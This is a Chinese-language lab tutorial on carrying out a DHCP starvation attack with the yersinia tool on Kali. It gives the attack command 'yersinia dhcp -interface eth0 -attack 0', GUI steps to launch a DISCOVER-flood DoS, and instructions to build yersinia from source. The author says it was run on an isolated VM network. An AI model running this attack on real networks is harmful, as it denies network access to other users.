DHCP欺骗攻击（耗尽地址池，附带yersinia编译安装解决方案）#

*系统: kali *主机: Pve虚拟机 *工具: advanced ip scanner局域网设备ip扫描工具 *Linux软件: yersinia 本文演示攻击环境为内网虚拟机环境，不影响公共网络

yersinia是一款底层协议入侵工具，它能伪装多种协议的报文并实施欺骗和攻击。 Yersinia具体可以虚拟的报文如下：

Spanning Tree Protocol (STP)

Cisco Discovery Protocol (CDP)

Dynamic Trunking Protocol (DTP)

Dynamic Host Configuration Protocol (DHCP)

Hot Standby Router Protocol (HSRP)

IEEE 802.1QIEEE 802.1X

Inter-Switch Link Protocol (ISL)

VLAN Trunking Protocol (VTP)

例如：夺取生成树stp的根角色，生成虚拟cdp（cisco 发现协议）邻居。在一个hsrp冗余型网络环境中伪装成一个活动的路由器、制造假dhcp 报文反馈，耗尽dhcp 地址池等等。

安装yersinia工具#

1
sudo apt-get install yersinia

Yersinia常用命令参数#

1
命令行使用方法
2
yersinia Protocol -interface eth -attack id
3
# 示例：
4
yersinia dhcp -interface eth0 -attack 0
5

6

7
h       帮助屏幕
8
x       选择并执行攻击
9
i       选择网卡
10
ENTER   关于选择项目的信息
11
v       查看数据包的16进制
12
d       加载协议默认值
13
e       编辑数据表字段
14
f       列出捕获文件
15
s       从协议保存数据包
16
S       保存-来自所有协议的数据包
17
L       从网络学习数据包
18
N       设置Mac欺骗开/关
19
l       列出正在运行的攻击
20
K       杀死所有正在运行的攻击
21
c       清除当前协议statc
22
C       清除所有协议状态
23
g       转到其他协议屏幕
24
ctrl-l  重绘屏幕
25
w       写入配置文件
26
a       关于这个工具
27
q       退出

启动图形化界面#

1
yersinia -G

使用示例#

点击Launch Attack，选着DHCP选项卡，选着sending DISCOVER packet，并勾选Dos选项，点击OK保存

点击菜单的Action中的execute attack执行攻击 Actiono

无法启动GUI模式（-G）解决方案#

先完全卸载yersinia包和依赖

1
apt remove --auto-remove yersinia
2
apt purge --auto-remove yersinia

从github克隆编译安装

1
git clone https://github.com/tomac/yersinia /opt/yersinia
2
// 从github克隆到/opt/yersinia
3
apt install autoconf libgtk-3-dev libnet1-dev libgtk2.0-dev libpcap-dev -y
4
// 安装一些编译所需的依赖包(这些包是必须的)
5

6
// 编译：
7
cd /opt/yersinia
8
./autogen.sh
9
// 用gtk编译yersinia
10
./configure --with-gtk
11
// 完成编译
12
make
13
make install
14

15
// 打开yersinia GUI
16
yersinia -G

GUI